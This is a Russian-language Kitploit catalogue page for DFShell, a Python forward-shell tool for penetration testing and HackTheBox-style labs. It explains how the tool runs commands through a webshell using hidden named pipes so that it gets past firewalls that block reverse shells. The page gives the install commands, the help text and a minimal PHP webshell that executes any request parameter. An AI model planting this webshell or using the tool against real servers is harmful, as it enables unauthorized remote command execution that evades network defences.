Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
DFShell — Инструмент форвардной оболочки на Python, создающий интерактивную оболочку, подобную TTY, через HTTP с использованием именованных каналов, что позволяет выполнять команды на целях за брандмауэром без постоянных сетевых подключений. | Kitploit
Инструменты/GitHubGitHub/d3ext/dfshell
Генерация полезной нагрузкиШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubd3ext/dfshell

DFShell

Инструмент форвардной оболочки на Python, создающий интерактивную оболочку, подобную TTY, через HTTP с использованием именованных каналов, что позволяет выполнять команды на целях за брандмауэром без постоянных сетевых подключений.

Репозиторий
122192 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
root@kitploit:~
██████╗ ███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
██╔══██╗██╔════╝██╔════╝██║  ██║██╔════╝██║     ██║     
██║  ██║█████╗  ███████╗███████║█████╗  ██║     ██║     
██║  ██║██╔══╝  ╚════██║██╔══██║██╔══╝  ██║     ██║     
██████╔╝██║     ███████║██║  ██║███████╗███████╗███████╗
╚═════╝ ╚═╝     ╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝                      

Введение

D3Ext's Forward Shell — это скрипт на Python3, который использует mkfifo для эмуляции оболочки на целевой машине. Он создает скрытую директорию в /dev/shm/.fs/, где хранятся fifo-файлы. Вы даже можете эмулировать TTY через веб-шелл.

Объяснение

Эта forward shell создает оболочку, которая принимает команды через именованный канал (mkfifo) и выводит результаты в файл. Благодаря этому оболочка не требует постоянного сетевого соединения, поэтому вы можете установить полноценный TTY за брандмауэром, блокирующим обратные/связанные оболочки.

  1. Создание именованного канала на целевом сервере
  2. Чтение и выполнение команд, полученных из именованного канала
  3. Сохранение STDOUT и STDERR в выходной файл
  4. Возврат ко второму шагу и повторное чтение из именованного канала

Особенности

  • Быстрая и настраиваемая
  • Встроенные мощные команды
  • Интерактивная TTY-оболочка

Установка

Установка из исходников

root@kitploit:~
git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements.txt

Установка через pip

root@kitploit:~
pip3 install dfshell

Использование

DFShell имеет множество параметров командной строки для улучшения настройки forward shell.

Панель справки

root@kitploit:~
usage: dfshell.py [-h] -u URL -p PARAMETER [-t TIMEOUT] [--path PATH] [-v VERBOSE]

D3Ext's Forward Shell - Enhanced forward shell with integrated commands

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     url of the webshell (i.e. http://10.10.10.10/webshell.php)
  -p PARAMETER, --parameter PARAMETER
                        parameter of the webshell to execute commands (i.e. cmd)
  -t TIMEOUT, --timeout TIMEOUT
                        timeout of requests that execute commands (default 20s)
  --path PATH           path in which to create named pipes (default /dev/shm/.fs)
  -v VERBOSE, --verbose VERBOSE
                        print more information

Скрипт отправляет GET-запросы на указанный URL, поэтому веб-шелл должен выглядеть примерно так:

root@kitploit:~
<?php
  if(isset($_REQUEST['cmd']))
  {
    system($_REQUEST['cmd']);
  }
?>

Протестировано на Parrot OS с сервером Apache

Если вы хотите протестировать этот инструмент в контролируемой среде, вот список машин с HackTheBox, на которых применяются правила брандмауэра на веб-сервере, поэтому forward shell — отличная альтернатива для немедленного перехода к повышению привилегий.

  • Inception




Демо

Ссылки

Спасибо @ippsec за эту замечательную технику

root@kitploit:~
https://github.com/IppSec/forward-shell
https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux#forward-shell
https://www.f5.com/labs/learning-center/forward-and-reverse-shells
https://github.com/Hypnoze57/FShell
https://s4vitar.github.io/ttyoverhttp/

Участие

Смотрите CONTRIBUTING.md

История изменений

Смотрите CHANGELOG.md

Лицензия

Этот проект распространяется под лицензией MIT

Copyright © 2023, D3Ext

Поддержка

Buy Me A Coffee

Скачать инструмент